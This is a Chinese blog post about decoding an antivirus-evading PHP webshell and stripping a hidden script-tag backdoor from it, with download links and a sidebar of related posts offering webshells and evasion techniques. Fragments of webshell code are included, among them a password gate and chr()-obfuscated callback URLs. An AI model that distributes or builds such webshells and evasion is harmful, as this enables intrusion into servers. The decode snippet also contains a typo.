一款免杀php大马的解密与去后门

最新推荐文章于 2021-10-20 16:06:25 发布
最新推荐文章于 2021-10-20 16:06:25 发布
阅读量5.2k 收藏 1
点赞数
2011-02-07 15:00   1322人阅读  

今天想找个php木马来管理自己的空间,但是手头没有,只好去网上找个,结果发现黑白网络有一个叫做“新版免杀php大马”的东西,于是下载了下来,我的avast果断给干掉了,尴尬 - -!好吧

于是关掉杀毒 ,重新下载,好吧,这是一个小插曲!、

[delphi]  view plain copy print ?
  1. 刚下下来的php源文件下载在这里  
  2. http://down.qiannao.com/space/file/strivescript/share/2011/2/7/-514d-6740php-5927-9a6c_-521d-4e0b-8f7d-7248.rar/.page  

 

然后把东西移动到虚拟机里面的php环境中,打开一看,有加密,用的函数是:

先用这个函数base64_decode()然后用这个函数gzuncompress()加密,好的是密文就一块啊,然后把这一块全部剪切

重新写个php文件:

[c-sharp]  view plain copy print ?
  1. <?php  
  2.      print_r(gzunconpress(base64_decode(密文段)));  
  3. ?>  

 

 

就这个简单,吼吼 ,源代码一览无余啊!!!!

 

看到源代码后

Ctrl+F找这个 http://

发现没问题,然后在浏览一下源代码,发现还有个加密地方:

分别用上面的方法 发现其中有个酷似后门

 

<script src='貌似后门地址' ></script>

 

然后删除这段代码

ok了 在跑一下 发现释放不出mix.dll

难得弄了 我解密后的源码可以到这里下载

 

 

[c-sharp]  view plain copy print ?
  1. http://down.qiannao.com/space/file/strivescript/share/2011/2/7/-9700-8981-91ca-653edll-7684php-9a6c.zip/.page  

 

 

 

 

该地址已失效 http://www.gngngn.com
sozhanma
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
未加密免杀php大马.php
02-21
现在的后门里面都有内藏后门,会被黑吃黑,我分享的这个大马解密,不会被螳螂捕蝉黄雀在后。可以过一些nginx防火墙的后门,防止被爆破密码,密码输错你指定的次数就拉黑ip段,后门登录需要账号和密码,非泛滥...
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
PHP大马实现分析编写
热门推荐
Love&Share
03-15 1万+
PHP工具开发 PHP 简单隐藏 登陆密码 实现写入文件 <?php $pass = '14e1b600b1fd579f47433b88e8d85291'; #123456 $get = $_GET['pass']; if (!empty($get)) { if (md5(md5($get))) { if (!empty($_POST)) { $path=$_POST['filepath']; $content=$_P
解密PHP大马
sievr的博客
12-05 1949
今晚晚自习闲得无聊,总得找个什么事来做,emmm…… 前几天意外得到了个大马,用了用感觉还不错,但就是特征太明显了。这大马基本上公开了,看见界面就知道密码,我肯定不服啊,就来解个码玩玩。 这是下载到的。 看着这一大段代码就头疼,啥都不管,直接扔网站里解密一波。 结果特么没一个行的,这个网站说是混淆加密,那个网站说是zend加密。气的我直接退出了。 既然网站解不了,那就只能手动解码了。 现在我才来...
实战分析PHP大马隐藏后门——案例二
W小哥
07-06 1691
一、PHP大马准备 PHP大马,示例如图所示 二、分析过程 第一步: 查看 php 大马的源码,惊奇的发现这代码也太少了吧,而且登录大马之后的功能还很多,代码这么少肯定有问题。 更多资源: 1、web安全工具、渗透测试工具 2、存在漏洞的网站源码与代码审计+漏洞复现教程、 3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频 4、应急响应真实案例复现靶场与应急响应教程 收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥 ...
php图片大马后门,一次对php大马后门的简单分析
weixin_30923925的博客
03-12 572
一次对php大马后门的简单分析有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116...
php大马 webshell.zip 去后门 可能报毒
04-21
webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。 解压密码:php
2022费的PHP在线解密工具源码V1.2
04-17
在线可解: 部分goto、PHPJiaMi、Enphp、vidun、phpdp(神盾)、tianyiw 无数据库上访问域名就能用 更新日志: V1.2 1.增加代码美化,混淆修复功能 2.增加“已知BUG”列表 ...6.修复部分goto无法解密
一款goto在线解源码,PHP源码解密工具
08-31
标题中的"goto在线解源码,PHP源码解密工具"是一款专门针对PHP源码进行解密的在线工具,它允许用户上传加密或混淆过的PHP代码,通过特定算法还原其可读性。下面我们将深入探讨PHP源码加密、混淆以及解密的相关知识点...
免杀php大马
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
aether_upload.7z
02-06
php文件上传框架,基于laravel
PHP大马非常好用
03-30
PHP大马非常好用PHP大马非常好用PHP大马非常好用PHP大马非常好用PHP大马非常好用
php-webshell大马(功能齐全)
10-28
php 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。
php大马,一句话
05-18
php最新大马,支持php7
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2874
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
html大马源码,php大马源码:【百家号】脸书百科,分析 PHP大马-php_mof SHELL Web程序...
weixin_34163588的博客
06-18 847
$password=‘phpinfo‘;//登录密码//----------功能程序------------------//$c="chr";session_start();if (empty($_SESSION[‘PhpCode‘])) {$url=$c(104).$c(116).$c(116).$c(112).$c(58);$url .=$c(47).$c(47).$c(119).$c(119...
免杀制作-教你如何一键制作window-CS上线免杀(新手推荐)
weixin_42109829的博客
10-20 7119
一、免杀思路 应该说每一类型的恶意软件所实施的反检测技术都是不一样的(恶意软件可以分为病毒、木、僵尸程序、流氓软件、勒索软件、广告程序等),虽然本文会对所有相关的反检测技术都进行介绍,但我们还是会将注意力放在stager阶段的meterpreter这种有效载荷的工具上,因为几乎所有的恶意软件的攻击命令的执行都必须依靠 meterpreter来实施攻击,例如: 提权、凭证窃取、进程迁移、注册表操作和分配更多的后续攻击, 另外,MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说
黑客免杀技术解析与反制策略
在基础篇中,作者首先解释了免杀技术的重要性及其发展历程,然后阐述了免杀与Rootkit、加密解密技术的区别。接着,书中介绍了反病毒软件的工作原理,包括基于文件扫描、内存扫描、行为监控以及新兴反病毒技术的详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值